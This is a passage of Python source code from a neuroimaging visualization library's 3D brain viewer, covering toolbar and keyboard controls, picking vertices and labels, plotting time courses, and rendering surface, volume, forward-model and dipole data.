self._renderer._tool_bar_add_button( name="visibility", desc="Toggle Controls", func=self.toggle_interface, icon_name="visibility_on" ) self.widgets["play"] = self._renderer._tool_bar_add_play_button( name="play", desc="Play/Pause", func=self.toggle_playback, shortcut=" ", ) self._renderer._tool_bar_add_button( name="reset", desc="Reset", func=self.reset, ) self._renderer._tool_bar_add_button( name="scale", desc="Auto-Scale", func=self.apply_auto_scaling, ) self._renderer._tool_bar_add_button( name="clear", desc="Clear traces", func=self.clear_glyphs, ) self._renderer._tool_bar_add_spacer() self._renderer._tool_bar_add_button( name="help", desc="Help", func=self.help, shortcut="?", ) def _shift_time(self, op): self.callbacks["time"]( value=(op(self._current_time, self.playback_speed)), time_as_index=False, update_widget=True, ) def _rotate_azimuth(self, value): azimuth = (self._renderer.figure._azimuth + value) % 360 self._renderer.set_camera(azimuth=azimuth, reset_camera=False) def _rotate_elevation(self, value): elevation = np.clip( self._renderer.figure._elevation + value, self._elevation_rng[0], self._elevation_rng[1], ) self._renderer.set_camera(elevation=elevation, reset_camera=False) def _configure_shortcuts(self): # First, we remove the default bindings: self._clear_callbacks() # Then, we add our own: self.plotter.add_key_event("i", self.toggle_interface) self.plotter.add_key_event("s", self.apply_auto_scaling) self.plotter.add_key_event("r", self.restore_user_scaling) self.plotter.add_key_event("c", self.clear_glyphs) self.plotter.add_key_event("n", partial(self._shift_time, op=lambda x, y: x + y)) self.plotter.add_key_event("b", partial(self._shift_time, op=lambda x, y: x - y)) for key, func, sign in (("Left", self._rotate_azimuth, 1), ("Right", self._rotate_azimuth, -1), ("Up", self._rotate_elevation, 1), ("Down", self._rotate_elevation, -1)): self.plotter.add_key_event(key, partial(func, sign * _ARROW_MOVE)) def _configure_menu(self): self._renderer._menu_initialize() self._renderer._menu_add_submenu( name="help", desc="Help", ) self._renderer._menu_add_button( menu_name="help", name="help", desc="Show MNE key bindings\t?", func=self.help, ) def _configure_status_bar(self): self._renderer._status_bar_initialize() self.status_msg = self._renderer._status_bar_add_label( self.default_status_bar_msg, stretch=1) self.status_progress = self._renderer._status_bar_add_progress_bar() if self.status_progress is not None: self.status_progress.hide() def _on_mouse_move(self, vtk_picker, event): if self._mouse_no_mvt: self._mouse_no_mvt -= 1 def _on_button_press(self, vtk_picker, event): self._mouse_no_mvt = 2 def _on_button_release(self, vtk_picker, event): if self._mouse_no_mvt > 0: x, y = vtk_picker.GetEventPosition() # programmatically detect the picked renderer try: # pyvista<0.30.0 self.picked_renderer = \ self.plotter.iren.FindPokedRenderer(x, y) except AttributeError: # pyvista>=0.30.0 self.picked_renderer = \ self.plotter.iren.interactor.FindPokedRenderer(x, y) # trigger the pick self.plotter.picker.Pick(x, y, 0, self.picked_renderer) self._mouse_no_mvt = 0 def _on_pick(self, vtk_picker, event): if not self.show_traces: return # vtk_picker is a vtkCellPicker cell_id = vtk_picker.GetCellId() mesh = vtk_picker.GetDataSet() if mesh is None or cell_id == -1 or not self._mouse_no_mvt: return # don't pick # 1) Check to see if there are any spheres along the ray if len(self._spheres): collection = vtk_picker.GetProp3Ds() found_sphere = None for ii in range(collection.GetNumberOfItems()): actor = collection.GetItemAsObject(ii) for sphere in self._spheres: if any(a is actor for a in sphere._actors): found_sphere = sphere break if found_sphere is not None: break if found_sphere is not None: assert found_sphere._is_glyph mesh = found_sphere # 2) Remove sphere if it's what we have if hasattr(mesh, "_is_glyph"): self._remove_vertex_glyph(mesh) return # 3) Otherwise, pick the objects in the scene try: hemi = mesh._hemi except AttributeError: # volume hemi = 'vol' else: assert hemi in ('lh', 'rh') if self.act_data_smooth[hemi][0] is None: # no data to add for hemi return pos = np.array(vtk_picker.GetPickPosition()) if hemi == 'vol': # VTK will give us the point closest to the viewer in the vol. # We want to pick the point with the maximum value along the # camera-to-click array, which fortunately we can get "just" # by inspecting the points that are sufficiently close to the # ray. grid = mesh = self._data[hemi]['grid'] vertices = self._data[hemi]['vertices'] coords = self._data[hemi]['grid_coords'][vertices] scalars = _cell_data(grid)['values'][vertices] spacing = np.array(grid.GetSpacing()) max_dist = np.linalg.norm(spacing) / 2. origin = vtk_picker.GetRenderer().GetActiveCamera().GetPosition() ori = pos - origin ori /= np.linalg.norm(ori) # the magic formula: distance from a ray to a given point dists = np.linalg.norm(np.cross(ori, coords - pos), axis=1) assert dists.shape == (len(coords),) mask = dists <= max_dist idx = np.where(mask)[0] if len(idx) == 0: return # weird point on edge of volume? # useful for debugging the ray by mapping it into the volume: # dists = dists - dists.min() # dists = (1. - dists / dists.max()) * self._cmap_range[1] # _cell_data(grid)['values'][vertices] = dists * mask idx = idx[np.argmax(np.abs(scalars[idx]))] vertex_id = vertices[idx] # Naive way: convert pos directly to idx; i.e., apply mri_src_t # shape = self._data[hemi]['grid_shape'] # taking into account the cell vs point difference (spacing/2) # shift = np.array(grid.GetOrigin()) + spacing / 2. # ijk = np.round((pos - shift) / spacing).astype(int) # vertex_id = np.ravel_multi_index(ijk, shape, order='F') else: vtk_cell = mesh.GetCell(cell_id) cell = [vtk_cell.GetPointId(point_id) for point_id in range(vtk_cell.GetNumberOfPoints())] vertices = mesh.points[cell] idx = np.argmin(abs(vertices - pos), axis=0) vertex_id = cell[idx[0]] if self.traces_mode == 'label': self._add_label_glyph(hemi, mesh, vertex_id) else: self._add_vertex_glyph(hemi, mesh, vertex_id) def _add_label_glyph(self, hemi, mesh, vertex_id): if hemi == 'vol': return label_id = self._vertex_to_label_id[hemi][vertex_id] label = self._annotation_labels[hemi][label_id] # remove the patch if already picked if label_id in self.picked_patches[hemi]: self._remove_label_glyph(hemi, label_id) return if hemi == label.hemi: self.add_label(label, borders=True, reset_camera=False) self.picked_patches[hemi].append(label_id) def _remove_label_glyph(self, hemi, label_id): label = self._annotation_labels[hemi][label_id] label._line.remove() self.color_cycle.restore(label._color) self.mpl_canvas.update_plot() self._layered_meshes[hemi].remove_overlay(label.name) self.picked_patches[hemi].remove(label_id) def _add_vertex_glyph(self, hemi, mesh, vertex_id, update=True): if vertex_id in self.picked_points[hemi]: return # skip if the wrong hemi is selected if self.act_data_smooth[hemi][0] is None: return color = next(self.color_cycle) line = self.plot_time_course(hemi, vertex_id, color, update=update) if hemi == 'vol': ijk = np.unravel_index( vertex_id, np.array(mesh.GetDimensions()) - 1, order='F') # should just be GetCentroid(center), but apparently it's VTK9+: # center = np.empty(3) # voxel.GetCentroid(center) voxel = mesh.GetCell(*ijk) pts = voxel.GetPoints() n_pts = pts.GetNumberOfPoints() center = np.empty((n_pts, 3)) for ii in range(pts.GetNumberOfPoints()): pts.GetPoint(ii, center[ii]) center = np.mean(center, axis=0) else: center = mesh.GetPoints().GetPoint(vertex_id) del mesh # from the picked renderer to the subplot coords try: lst = self._renderer._all_renderers._renderers except AttributeError: lst = self._renderer._all_renderers rindex = lst.index(self.picked_renderer) row, col = self._renderer._index_to_loc(rindex) actors = list() spheres = list() for _ in self._iter_views(hemi): # Using _sphere() instead of renderer.sphere() for 2 reasons: # 1) renderer.sphere() fails on Windows in a scenario where a lot # of picking requests are done in a short span of time (could be # mitigated with synchronization/delay?) # 2) the glyph filter is used in renderer.sphere() but only one # sphere is required in this function. actor, sphere = self._renderer._sphere( center=np.array(center), color=color, radius=4.0, ) actors.append(actor) spheres.append(sphere) # add metadata for picking for sphere in spheres: sphere._is_glyph = True sphere._hemi = hemi sphere._line = line sphere._actors = actors sphere._color = color sphere._vertex_id = vertex_id self.picked_points[hemi].append(vertex_id) self._spheres.extend(spheres) self.pick_table[vertex_id] = spheres return sphere def _remove_vertex_glyph(self, mesh, render=True): vertex_id = mesh._vertex_id if vertex_id not in self.pick_table: return hemi = mesh._hemi color = mesh._color spheres = self.pick_table[vertex_id] spheres[0]._line.remove() self.mpl_canvas.update_plot() self.picked_points[hemi].remove(vertex_id) with warnings.catch_warnings(record=True): # We intentionally ignore these in case we have traversed the # entire color cycle warnings.simplefilter('ignore') self.color_cycle.restore(color) for sphere in spheres: # remove all actors self.plotter.remove_actor(sphere._actors, render=render) sphere._actors = None self._spheres.pop(self._spheres.index(sphere)) self.pick_table.pop(vertex_id) def clear_glyphs(self): """Clear the picking glyphs.""" if not self.time_viewer: return for sphere in list(self._spheres): # will remove itself, so copy self._remove_vertex_glyph(sphere, render=False) assert sum(len(v) for v in self.picked_points.values()) == 0 assert len(self.pick_table) == 0 assert len(self._spheres) == 0 for hemi in self._hemis: for label_id in list(self.picked_patches[hemi]): self._remove_label_glyph(hemi, label_id) assert sum(len(v) for v in self.picked_patches.values()) == 0 if self.rms is not None: self.rms.remove() self.rms = None self._renderer._update() def plot_time_course(self, hemi, vertex_id, color, update=True): """Plot the vertex time course. Parameters ---------- hemi : str The hemisphere id of the vertex. vertex_id : int The vertex identifier in the mesh. color : matplotlib color The color of the time course. update : bool Force an update of the plot. Defaults to True. Returns ------- line : matplotlib object The time line object. """ if self.mpl_canvas is None: return time = self._data['time'].copy() # avoid circular ref mni = None if hemi == 'vol': hemi_str = 'V' xfm = read_talxfm( self._subject_id, self._subjects_dir) if self._units == 'mm': xfm['trans'][:3, 3] *= 1000. ijk = np.unravel_index( vertex_id, self._data[hemi]['grid_shape'], order='F') src_mri_t = self._data[hemi]['grid_src_mri_t'] mni = apply_trans(np.dot(xfm['trans'], src_mri_t), ijk) else: hemi_str = 'L' if hemi == 'lh' else 'R' try: mni = vertex_to_mni( vertices=vertex_id, hemis=0 if hemi == 'lh' else 1, subject=self._subject_id, subjects_dir=self._subjects_dir ) except Exception: mni = None if mni is not None: mni = ' MNI: ' + ', '.join('%5.1f' % m for m in mni) else: mni = '' label = "{}:{}{}".format(hemi_str, str(vertex_id).ljust(6), mni) act_data, smooth = self.act_data_smooth[hemi] if smooth is not None: act_data = smooth[vertex_id].dot(act_data)[0] else: act_data = act_data[vertex_id].copy() line = self.mpl_canvas.plot( time, act_data, label=label, lw=1., color=color, zorder=4, update=update, ) return line def plot_time_line(self, update=True): """Add the time line to the MPL widget. Parameters ---------- update : bool Force an update of the plot. Defaults to True. """ if self.mpl_canvas is None: return if isinstance(self.show_traces, bool) and self.show_traces: # add time information current_time = self._current_time if not hasattr(self, "time_line"): self.time_line = self.mpl_canvas.plot_time_line( x=current_time, label='time', color=self._fg_color, lw=1, update=update, ) self.time_line.set_xdata(current_time) if update: self.mpl_canvas.update_plot() def _configure_help(self): pairs = [ ('?', 'Display help window'), ('i', 'Toggle interface'), ('s', 'Apply auto-scaling'), ('r', 'Restore original clim'), ('c', 'Clear all traces'), ('n', 'Shift the time forward by the playback speed'), ('b', 'Shift the time backward by the playback speed'), ('Space', 'Start/Pause playback'), ('Up', 'Decrease camera elevation angle'), ('Down', 'Increase camera elevation angle'), ('Left', 'Decrease camera azimuth angle'), ('Right', 'Increase camera azimuth angle'), ] text1, text2 = zip(*pairs) text1 = '\n'.join(text1) text2 = '\n'.join(text2) self.help_canvas = self._renderer._window_get_simple_canvas( width=5, height=2, dpi=80) _show_help_fig( col1=text1, col2=text2, fig_help=self.help_canvas.fig, ax=self.help_canvas.axes, show=False, ) def help(self): """Display the help window.""" self.help_canvas.show() def _clear_callbacks(self): if not hasattr(self, 'callbacks'): return for callback in self.callbacks.values(): if callback is not None: for key in ('plotter', 'brain', 'callback', 'widget', 'widgets'): setattr(callback, key, None) self.callbacks.clear() # Remove the default key binding if getattr(self, "iren", None) is not None: self.plotter.iren.clear_key_event_callbacks() def _clear_widgets(self): if not hasattr(self, 'widgets'): return for widget in self.widgets.values(): if widget is not None: for key in ('triggered', 'valueChanged'): setattr(widget, key, None) self.widgets.clear() @property def interaction(self): """The interaction style.""" return self._interaction @interaction.setter def interaction(self, interaction): """Set the interaction style.""" _validate_type(interaction, str, 'interaction') _check_option('interaction', interaction, ('trackball', 'terrain')) for _ in self._iter_views('vol'): # will traverse all self._renderer.set_interaction(interaction) def _cortex_colormap(self, cortex): """Return the colormap corresponding to the cortex.""" from .._3d import _get_cmap from matplotlib.colors import ListedColormap colormap_map = dict(classic=dict(colormap="Greys", vmin=-1, vmax=2), high_contrast=dict(colormap="Greys", vmin=-.1, vmax=1.3), low_contrast=dict(colormap="Greys", vmin=-5, vmax=5), bone=dict(colormap="bone_r", vmin=-.2, vmax=2), ) _validate_type(cortex, (str, dict, list, tuple), 'cortex') if isinstance(cortex, str): if cortex in colormap_map: cortex = colormap_map[cortex] else: cortex = [cortex] * 2 if isinstance(cortex, (list, tuple)): _check_option('len(cortex)', len(cortex), (2, 3), extra='when cortex is a list or tuple') if len(cortex) == 3: cortex = [cortex] * 2 cortex = list(cortex) for ci, c in enumerate(cortex): cortex[ci] = _to_rgb(c, name='cortex') cortex = dict( colormap=ListedColormap(cortex, name='custom binary'), vmin=0, vmax=1) cortex = dict( vmin=float(cortex['vmin']), vmax=float(cortex['vmax']), colormap=_get_cmap(cortex['colormap']), ) return cortex def _remove(self, item, render=False): """Remove actors from the rendered scene.""" if item in self._actors: logger.debug( f'Removing {len(self._actors[item])} {item} actor(s)') for actor in self._actors[item]: self._renderer.plotter.remove_actor(actor) self._actors.pop(item) # remove actor list if render: self._renderer._update() def _add_actor(self, item, actor): """Add an actor to the internal register.""" if item in self._actors: # allows adding more than one self._actors[item].append(actor) else: self._actors[item] = [actor] @verbose def add_data(self, array, fmin=None, fmid=None, fmax=None, thresh=None, center=None, transparent=False, colormap="auto", alpha=1, vertices=None, smoothing_steps=None, time=None, time_label="auto", colorbar=True, hemi=None, remove_existing=None, time_label_size=None, initial_time=None, scale_factor=None, vector_alpha=None, clim=None, src=None, volume_options=0.4, colorbar_kwargs=None, verbose=None): """Display data from a numpy array on the surface or volume. This provides a similar interface to :meth:`surfer.Brain.add_overlay`, but it displays it with a single colormap. It offers more flexibility over the colormap, and provides a way to display four-dimensional data (i.e., a timecourse) or five-dimensional data (i.e., a vector-valued timecourse). .. note:: ``fmin`` sets the low end of the colormap, and is separate from thresh (this is a different convention from :meth:`surfer.Brain.add_overlay`). Parameters ---------- array : numpy array, shape (n_vertices[, 3][, n_times]) Data array. For the data to be understood as vector-valued (3 values per vertex corresponding to X/Y/Z surface RAS), then ``array`` must be have all 3 dimensions. If vectors with no time dimension are desired, consider using a singleton (e.g., ``np.newaxis``) to create a "time" dimension and pass ``time_label=None`` (vector values are not supported). %(fmin_fmid_fmax)s %(thresh)s %(center)s %(transparent)s colormap : str, list of color, or array Name of matplotlib colormap to use, a list of matplotlib colors, or a custom look up table (an n x 4 array coded with RBGA values between 0 and 255), the default "auto" chooses a default divergent colormap, if "center" is given (currently "icefire"), otherwise a default sequential colormap (currently "rocket"). alpha : float in [0, 1] Alpha level to control opacity of the overlay. vertices : numpy array Vertices for which the data is defined (needed if ``len(data) < nvtx``). smoothing_steps : int or None Number of smoothing steps (smoothing is used if len(data) < nvtx) The value 'nearest' can be used too. None (default) will use as many as necessary to fill the surface. time : numpy array Time points in the data array (if data is 2D or 3D). %(time_label)s colorbar : bool Whether to add a colorbar to the figure. Can also be a tuple to give the (row, col) index of where to put the colorbar. hemi : str | None If None, it is assumed to belong to the hemisphere being shown. If two hemispheres are being shown, an error will be thrown. remove_existing : bool Not supported yet. Remove surface added by previous "add_data" call. Useful for conserving memory when displaying different data in a loop. time_label_size : int Font size of the time label (default 14). initial_time : float | None Time initially shown in the plot. ``None`` to use the first time sample (default). scale_factor : float | None (default) The scale factor to use when displaying glyphs for vector-valued data. vector_alpha : float | None Alpha level to control opacity of the arrows. Only used for vector-valued data. If None (default), ``alpha`` is used. clim : dict Original clim arguments. %(src_volume_options)s colorbar_kwargs : dict | None Options to pass to :meth:`pyvista.Plotter.add_scalar_bar` (e.g., ``dict(title_font_size=10)``). %(verbose)s Notes ----- If the data is defined for a subset of vertices (specified by the "vertices" parameter), a smoothing method is used to interpolate the data onto the high resolution surface. If the data is defined for subsampled version of the surface, smoothing_steps can be set to None, in which case only as many smoothing steps are applied until the whole surface is filled with non-zeros. Due to a VTK alpha rendering bug, ``vector_alpha`` is clamped to be strictly < 1. """ _validate_type(transparent, bool, 'transparent') _validate_type(vector_alpha, ('numeric', None), 'vector_alpha') _validate_type(scale_factor, ('numeric', None), 'scale_factor') # those parameters are not supported yet, only None is allowed _check_option('thresh', thresh, [None]) _check_option('remove_existing', remove_existing, [None]) _validate_type(time_label_size, (None, 'numeric'), 'time_label_size') if time_label_size is not None: time_label_size = float(time_label_size) if time_label_size < 0: raise ValueError('time_label_size must be positive, got ' f'{time_label_size}') hemi = self._check_hemi(hemi, extras=['vol']) stc, array, vertices = self._check_stc(hemi, array, vertices) array = np.asarray(array) vector_alpha = alpha if vector_alpha is None else vector_alpha self._data['vector_alpha'] = vector_alpha self._data['scale_factor'] = scale_factor # Create time array and add label if > 1D if array.ndim <= 1: time_idx = 0 else: # check time array if time is None: time = np.arange(array.shape[-1]) else: time = np.asarray(time) if time.shape != (array.shape[-1],): raise ValueError('time has shape %s, but need shape %s ' '(array.shape[-1])' % (time.shape, (array.shape[-1],))) self._data["time"] = time if self._n_times is None: self._times = time elif len(time) != self._n_times: raise ValueError("New n_times is different from previous " "n_times") elif not np.array_equal(time, self._times): raise ValueError("Not all time values are consistent with " "previously set times.") # initial time if initial_time is None: time_idx = 0 else: time_idx = self._to_time_index(initial_time) # time label time_label, _ = _handle_time(time_label, 's', time) y_txt = 0.05 + 0.1 * bool(colorbar) if array.ndim == 3: if array.shape[1] != 3: raise ValueError('If array has 3 dimensions, array.shape[1] ' 'must equal 3, got %s' % (array.shape[1],)) fmin, fmid, fmax = _update_limits( fmin, fmid, fmax, center, array ) if colormap == 'auto': colormap = 'mne' if center is not None else 'hot' if smoothing_steps is None: smoothing_steps = 7 elif smoothing_steps == 'nearest': smoothing_steps = -1 elif isinstance(smoothing_steps, int): if smoothing_steps < 0: raise ValueError('Expected value of `smoothing_steps` is' ' positive but {} was given.'.format( smoothing_steps)) else: raise TypeError('Expected type of `smoothing_steps` is int or' ' NoneType but {} was given.'.format( type(smoothing_steps))) self._data['stc'] = stc self._data['src'] = src self._data['smoothing_steps'] = smoothing_steps self._data['clim'] = clim self._data['time'] = time self._data['initial_time'] = initial_time self._data['time_label'] = time_label self._data['initial_time_idx'] = time_idx self._data['time_idx'] = time_idx self._data['transparent'] = transparent # data specific for a hemi self._data[hemi] = dict() self._data[hemi]['glyph_dataset'] = None self._data[hemi]['glyph_mapper'] = None self._data[hemi]['glyph_actor'] = None self._data[hemi]['array'] = array self._data[hemi]['vertices'] = vertices self._data['alpha'] = alpha self._data['colormap'] = colormap self._data['center'] = center self._data['fmin'] = fmin self._data['fmid'] = fmid self._data['fmax'] = fmax self.update_lut() # 1) add the surfaces first actor = None for _ in self._iter_views(hemi): if hemi in ('lh', 'rh'): actor = self._layered_meshes[hemi]._actor else: src_vol = src[2:] if src.kind == 'mixed' else src actor, _ = self._add_volume_data(hemi, src_vol, volume_options) assert actor is not None # should have added one self._add_actor('data', actor) # 2) update time and smoothing properties # set_data_smoothing calls "set_time_point" for us, which will set # _current_time self.set_time_interpolation(self.time_interpolation) self.set_data_smoothing(self._data['smoothing_steps']) # 3) add the other actors if colorbar is True: # bottom left by default colorbar = (self._subplot_shape[0] - 1, 0) for ri, ci, v in self._iter_views(hemi): # Add the time label to the bottommost view do = (ri, ci) == colorbar if not self._time_label_added and time_label is not None and do: time_actor = self._renderer.text2d( x_window=0.95, y_window=y_txt, color=self._fg_color, size=time_label_size, text=time_label(self._current_time), justification='right' ) self._data['time_actor'] = time_actor self._time_label_added = True if colorbar and self._scalar_bar is None and do: kwargs = dict(source=actor, n_labels=8, color=self._fg_color, bgcolor=self._brain_color[:3]) kwargs.update(colorbar_kwargs or {}) self._scalar_bar = self._renderer.scalarbar(**kwargs) self._renderer.set_camera( update=False, reset_camera=False, **views_dicts[hemi][v]) # 4) update the scalar bar and opacity self.update_lut(alpha=alpha) def remove_data(self): """Remove rendered data from the mesh.""" self._remove('data', render=True) def _iter_views(self, hemi): """Iterate over rows and columns that need to be added to.""" hemi_dict = dict(lh=[0], rh=[0], vol=[0]) if self._hemi == 'split': hemi_dict.update(rh=[1], vol=[0, 1]) for vi, view in enumerate(self._views): view_dict = dict(lh=[vi], rh=[vi], vol=[vi]) if self._hemi == 'split': view_dict.update(vol=[vi, vi]) if self._view_layout == 'vertical': rows, cols = view_dict, hemi_dict # views are rows, hemis cols else: rows, cols = hemi_dict, view_dict # hemis are rows, views cols for ri, ci in zip(rows[hemi], cols[hemi]): self._renderer.subplot(ri, ci) yield ri, ci, view def remove_labels(self): """Remove all the ROI labels from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] for label in self._labels[hemi]: mesh.remove_overlay(label.name) self._labels[hemi].clear() self._renderer._update() def remove_annotations(self): """Remove all annotations from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] mesh.remove_overlay(self._annots[hemi]) self._annots[hemi].clear() self._renderer._update() def _add_volume_data(self, hemi, src, volume_options): from ..backends._pyvista import _hide_testing_actor _validate_type(src, SourceSpaces, 'src') _check_option('src.kind', src.kind, ('volume',)) _validate_type( volume_options, (dict, 'numeric', None), 'volume_options') assert hemi == 'vol' if not isinstance(volume_options, dict): volume_options = dict( resolution=float(volume_options) if volume_options is not None else None) volume_options = _handle_default('volume_options', volume_options) allowed_types = ( ['resolution', (None, 'numeric')], ['blending', (str,)], ['alpha', ('numeric', None)], ['surface_alpha', (None, 'numeric')], ['silhouette_alpha', (None, 'numeric')], ['silhouette_linewidth', ('numeric',)], ) for key, types in allowed_types: _validate_type(volume_options[key], types, f'volume_options[{repr(key)}]') extra_keys = set(volume_options) - set(a[0] for a in allowed_types) if len(extra_keys): raise ValueError( f'volume_options got unknown keys {sorted(extra_keys)}') blending = _check_option('volume_options["blending"]', volume_options['blending'], ('composite', 'mip')) alpha = volume_options['alpha'] if alpha is None: alpha = 0.4 if self._data[hemi]['array'].ndim == 3 else 1. alpha = np.clip(float(alpha), 0., 1.) resolution = volume_options['resolution'] surface_alpha = volume_options['surface_alpha'] if surface_alpha is None: surface_alpha = min(alpha / 2., 0.1) silhouette_alpha = volume_options['silhouette_alpha'] if silhouette_alpha is None: silhouette_alpha = surface_alpha / 4. silhouette_linewidth = volume_options['silhouette_linewidth'] del volume_options volume_pos = self._data[hemi].get('grid_volume_pos') volume_neg = self._data[hemi].get('grid_volume_neg') center = self._data['center'] if volume_pos is None: xyz = np.meshgrid( *[np.arange(s) for s in src[0]['shape']], indexing='ij') dimensions = np.array(src[0]['shape'], int) mult = 1000 if self._units == 'mm' else 1 src_mri_t = src[0]['src_mri_t']['trans'].copy() src_mri_t[:3] *= mult if resolution is not None: resolution = resolution * mult / 1000. # to mm del src, mult coords = np.array([c.ravel(order='F') for c in xyz]).T coords = apply_trans(src_mri_t, coords) self.geo[hemi] = Bunch(coords=coords) vertices = self._data[hemi]['vertices'] assert self._data[hemi]['array'].shape[0] == len(vertices) # MNE constructs the source space on a uniform grid in MRI space, # but mne coreg can change it to be non-uniform, so we need to # use all three elements here assert np.allclose( src_mri_t[:3, :3], np.diag(np.diag(src_mri_t)[:3])) spacing = np.diag(src_mri_t)[:3] origin = src_mri_t[:3, 3] - spacing / 2. scalars = np.zeros(np.prod(dimensions)) scalars[vertices] = 1. # for the outer mesh grid, grid_mesh, volume_pos, volume_neg = \ self._renderer._volume(dimensions, origin, spacing, scalars, surface_alpha, resolution, blending, center) self._data[hemi]['alpha'] = alpha # incorrectly set earlier self._data[hemi]['grid'] = grid self._data[hemi]['grid_mesh'] = grid_mesh self._data[hemi]['grid_coords'] = coords self._data[hemi]['grid_src_mri_t'] = src_mri_t self._data[hemi]['grid_shape'] = dimensions self._data[hemi]['grid_volume_pos'] = volume_pos self._data[hemi]['grid_volume_neg'] = volume_neg actor_pos, _ = self._renderer.plotter.add_actor( volume_pos, reset_camera=False, name=None, culling=False, render=False) actor_neg = actor_mesh = None if volume_neg is not None: actor_neg, _ = self._renderer.plotter.add_actor( volume_neg, reset_camera=False, name=None, culling=False, render=False) grid_mesh = self._data[hemi]['grid_mesh'] if grid_mesh is not None: actor_mesh, prop = self._renderer.plotter.add_actor( grid_mesh, reset_camera=False, name=None, culling=False, pickable=False, render=False) prop.SetColor(*self._brain_color[:3]) prop.SetOpacity(surface_alpha) if silhouette_alpha > 0 and silhouette_linewidth > 0: for _ in self._iter_views('vol'): self._renderer._silhouette( mesh=grid_mesh.GetInput(), color=self._brain_color[:3], line_width=silhouette_linewidth, alpha=silhouette_alpha, ) for actor in (actor_pos, actor_neg, actor_mesh): if actor is not None: _hide_testing_actor(actor) return actor_pos, actor_neg def add_label(self, label, color=None, alpha=1, scalar_thresh=None, borders=False, hemi=None, subdir=None, reset_camera=True): """Add an ROI label to the image. Parameters ---------- label : str | instance of Label Label filepath or name. Can also be an instance of an object with attributes "hemi", "vertices", "name", and optionally "color" and "values" (if scalar_thresh is not None). color : matplotlib-style color | None Anything matplotlib accepts: string, RGB, hex, etc. (default "crimson"). alpha : float in [0, 1] Alpha level to control opacity. scalar_thresh : None | float Threshold the label ids using this value in the label file's scalar field (i.e. label only vertices with scalar >= thresh). borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. subdir : None | str If a label is specified as name, subdir can be used to indicate that the label file is in a sub-directory of the subject's label directory rather than in the label directory itself (e.g. for ``$SUBJECTS_DIR/$SUBJECT/label/aparc/lh.cuneus.label`` ``brain.add_label('cuneus', subdir='aparc')``). reset_camera : bool If True, reset the camera view after adding the label. Defaults to True. Notes ----- To remove previously added labels, run Brain.remove_labels(). """ from ...label import read_label if isinstance(label, str): if color is None: color = "crimson" if os.path.isfile(label): filepath = label label = read_label(filepath) hemi = label.hemi label_name = os.path.basename(filepath).split('.')[1] else: hemi = self._check_hemi(hemi) label_name = label label_fname = ".".join([hemi, label_name, 'label']) if subdir is None: filepath = op.join(self._subjects_dir, self._subject_id, 'label', label_fname) else: filepath = op.join(self._subjects_dir, self._subject_id, 'label', subdir, label_fname) if not os.path.exists(filepath): raise ValueError('Label file %s does not exist' % filepath) label = read_label(filepath) ids = label.vertices scalars = label.values else: # try to extract parameters from label instance try: hemi = label.hemi ids = label.vertices if label.name is None: label.name = 'unnamed' + str(self._unnamed_label_id) self._unnamed_label_id += 1 label_name = str(label.name) if color is None: if hasattr(label, 'color') and label.color is not None: color = label.color else: color = "crimson" if scalar_thresh is not None: scalars = label.values except Exception: raise ValueError('Label was not a filename (str), and could ' 'not be understood as a class. The class ' 'must have attributes "hemi", "vertices", ' '"name", and (if scalar_thresh is not None)' '"values"') hemi = self._check_hemi(hemi) if scalar_thresh is not None: ids = ids[scalars >= scalar_thresh] if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': stc = self._data["stc"] src = self._data["src"] tc = stc.extract_label_time_course(label, src=src, mode=self.label_extract_mode) tc = tc[0] if tc.ndim == 2 else tc[0, 0, :] color = next(self.color_cycle) line = self.mpl_canvas.plot( self._data['time'], tc, label=label_name, color=color) else: line = None orig_color = color color = _to_rgb(color, alpha, alpha=True) cmap = np.array([(0, 0, 0, 0,), color]) ctable = np.round(cmap * 255).astype(np.uint8) scalars = np.zeros(self.geo[hemi].coords.shape[0]) scalars[ids] = 1 if borders: keep_idx = _mesh_borders(self.geo[hemi].faces, scalars) show = np.zeros(scalars.size, dtype=np.int64) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].faces.shape keep_idx = self.geo[hemi].faces[np.any( keep_idx, axis=1)] keep_idx = np.unique(keep_idx) show[keep_idx] = 1 scalars *= show for _, _, v in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=scalars, colormap=ctable, rng=[np.min(scalars), np.max(scalars)], opacity=alpha, name=label_name, ) if reset_camera: self._renderer.set_camera(update=False, **views_dicts[hemi][v]) if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': label._color = orig_color label._line = line self._labels[hemi].append(label) self._renderer._update() @fill_doc def add_forward(self, fwd, trans, alpha=1, scale=None): """Add a quiver to render positions of dipoles. Parameters ---------- %(fwd)s %(trans_not_none)s %(alpha)s Default 1. scale : None | float The size of the arrow representing the dipoles in :class:`mne.viz.Brain` units. Default 1.5mm. Notes ----- .. versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans if scale is None: scale = 1.5 if self._units == 'mm' else 1.5e-3 error_msg = ('Unexpected forward model coordinate frame ' '{}, must be "head" or "mri"') if fwd['coord_frame'] in _frame_to_str: fwd_frame = _frame_to_str[fwd['coord_frame']] if fwd_frame == 'mri': fwd_trans = Transform('mri', 'mri') elif fwd_frame == 'head': fwd_trans = head_mri_t else: raise RuntimeError(error_msg.format(fwd_frame)) else: raise RuntimeError(error_msg.format(fwd['coord_frame'])) for actor in _plot_forward( self._renderer, fwd, fwd_trans, fwd_scale=1e3 if self._units == 'mm' else 1, scale=scale, alpha=alpha): self._add_actor('forward', actor) self._renderer._update() def remove_forward(self): """Remove forward sources from the rendered scene.""" self._remove('forward', render=True) @fill_doc def add_dipole(self, dipole, trans, colors='red', alpha=1, scales=None): """Add a quiver to render positions of dipoles. Parameters ---------- dipole : instance of Dipole Dipole object containing position, orientation and amplitude of one or more dipoles or in the forward solution. %(trans_not_none)s colors : list | matplotlib-style color | None A single color or list of anything matplotlib accepts: string, RGB, hex, etc. Default red. %(alpha)s Default 1. scales : list | float | None The size of the arrow representing the dipole in :class:`mne.viz.Brain` units. Default 5mm. Notes ----- .. versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans n_dipoles = len(dipole) if not isinstance(colors, (list, tuple)): colors = [colors] * n_dipoles # make into list if len(colors) != 